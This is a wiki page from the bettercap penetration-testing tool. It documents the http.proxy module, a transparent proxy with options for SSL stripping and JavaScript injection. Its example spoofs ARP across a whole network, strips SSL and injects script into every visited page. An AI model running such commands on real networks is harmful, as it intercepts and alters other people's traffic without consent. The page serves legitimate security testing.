4

http.proxy

evilsocket edited this page 2018-08-15 19:32:13 +02:00

A full featured HTTP transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all HTTP traffic will be redirected to it and it will automatically handle port redirections as needed.

Commands

command	description
http.proxy on	Start the HTTP proxy.
http.proxy off	Stop the HTTP proxy.

Parameters

parameter	default	description
http.port	80	HTTP port to redirect when the proxy is activated.
http.proxy.address	<interface address>	Address to bind the HTTP proxy to.
http.proxy.port	8080	Port to bind the HTTP proxy to.
http.proxy.sslstrip	false	Enable or disable SSL stripping.
http.proxy.script		Path of a proxy module script.
http.proxy.injectjs		URL, path or javascript code to inject into every HTML page.

Examples

Will ARP spoof the whole network, enable sslstrip and inject a "Hello World" javascript alert to every HTML page being visited:

set http.proxy.injectjs alert("Hello World")
set http.proxy.sslstrip true

http.proxy on
arp.spoof on

• Known Issues
• Using with Docker
• Compilation
  • on Linux and macOS
  • on Windows
  • on Android
  • cross compilation (ARM example)
• Interactive Mode and Command Line Arguments
• Changing the Prompt
• Caplets

Modules

• Core
  • events.stream
  • ticker
  • api.rest
  • update
  • caplets
• HID on 2.4Ghz (mousejacking)
  • hid.recon / sniff / inject
• Bluetooth Low Energy
  • ble.recon / enum / write
• 802.11
  • wifi.recon / assoc / deauth / ap
• Ethernet and IP
  • net.recon
  • net.probe
  • net.sniff / net.fuzz
  • syn.scan
  • wake on lan
  • Spoofers
    • arp.spoof
    • dhcp6.spoof
    • dns.spoof
  • Proxies
    • any.proxy
    • packet.proxy
    • tcp.proxy
      • modules
    • http.proxy
    • https.proxy
      • modules
• Servers
  • http.server
  • https.server
• Rogue Servers
  • mysql.server
• Utils
  • mac.changer
  • gps

bettercap.org | @bettercap | team